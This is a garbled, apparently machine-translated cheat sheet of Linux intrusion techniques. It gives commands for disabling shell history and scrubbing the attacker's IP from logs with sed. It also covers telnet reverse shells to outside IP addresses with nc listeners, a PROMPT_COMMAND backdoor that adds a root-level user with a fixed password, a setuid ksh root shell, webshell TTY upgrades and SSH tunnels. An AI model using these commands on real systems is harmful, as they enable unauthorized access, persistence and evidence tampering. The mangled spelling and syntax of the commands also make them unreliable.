Linux intrusion Techniques

1. logon to ssh does not record ingress; exportHISTFILEdevnull; exportHISTSIZE0; some evil usages of exportHISTFILESIZE02.sed replace evil with the login IP address and access IPsed-ss211.xxx.xxx.xxx19 in the log

1. Do not record history after logging on to ssh

UnSetHistory histfile histsave histzone history histlog;ExPort HISTFILE =/dev/null;ExportHISTSIZE = 0; export HISTFILESIZE = 0

2. sEdSome evil usage
It is an evil replacement to the logon IP address and the access IP address in the log.

Sed-S's/211. xxx/192.168.1.1/G' access_log access. log security

Attackers can add ssh-restricted logon users.

Sed-I's/AllowUsers fuck root oracle rqcuser/G' sshd_config

However, after this addition, the sshd service must be forcibly restarted to take effect.

LsOf-I: 22. Find the sshd process ID.
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
Sshd 18662 root 11u IPv6 27925867 TCP *: ssh (LISTEN)
Sshd 31793 sshd 12u IPv6 34742994 TCP 192.168.1.2: ssh-> 192.168.1.5: 49080 (ESTABLISHED)
Then
Kill-SIGHUP 18662

 

3. Get the real ttyshell after returning the shell through webshell bounce

Python-c 'import pty; pty. spawn ("/bin/sh ")'
Another method to obtain ttyshell
$CatSh. exp
#! /Usr/bin/CT
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh,SuAnd login
Spawn sh
Interact
Bash sh. exp

 

4. Perform reverse connections via TELNET:

TeLnEt [attacker_ipaDdR] [port1]/bin/bashTelnet[Attacker_ipaddr] [port2]
Telnet 210.51.173.41 8080/bin/bash telnet 210.51.173.41 8081
/Usr/bin/telnet 203.93.28.236 8000/bin/bash/usr/bin/telnet 203.93.28.236 8001
Run the following command on 203.93.28.236:
Nc-L-p 8000
Nc-l-p 8001
/Usr/bin/telnet 192.168.1.100 8088/bin/bash/usr/bin/telnet 192.168.1.100 8089

 

5. curl download

The full command shocouldLookSomething like this:
Curl-C-O http://www.mirror.com/path/to/NeoOffice-Patch.dmg

 

6. In Windows, NC listens to linux and returns shell for execution.CommandSolution to incorrect line feed

UnAliasLs

 

7. linux BASH Privilege Escalation

Export PROMPT_COMMAND = "/usr/sbin/Useradd-O-u 0 kkoo &>/dev/null & echo kkoo: 123456/usr/sbin/chPasswd&>/Dev/null &&UnsetPROMPT_COMMAND"

 

8. ssh tunnel

Ssh-C-f-N-g-L listen_portST_HostST_port user @ Tunnel_Host
Ssh-C-f-N-g-R listen_portST_HostST_port user @ Tunnel_Host
Ssh-C-f-N-g-D listen_port user @ Tunnel_Host-f

 

9. Local rootshell

Bash and tcsh won't work, and Other ash bsh zsh ksh can work. The procedure is simple.Cp/Bin/ksh .;ChownRoot. root ksh;Chmod4755 ksh, and then run ksh to get the root permission. Although this trick seems vulgar, it is useful in some cases. Therefore, deleting excessive shells may increase the intrusion cost to some extent. If you do not implement the shell, you can consider adding this operation to the standardization.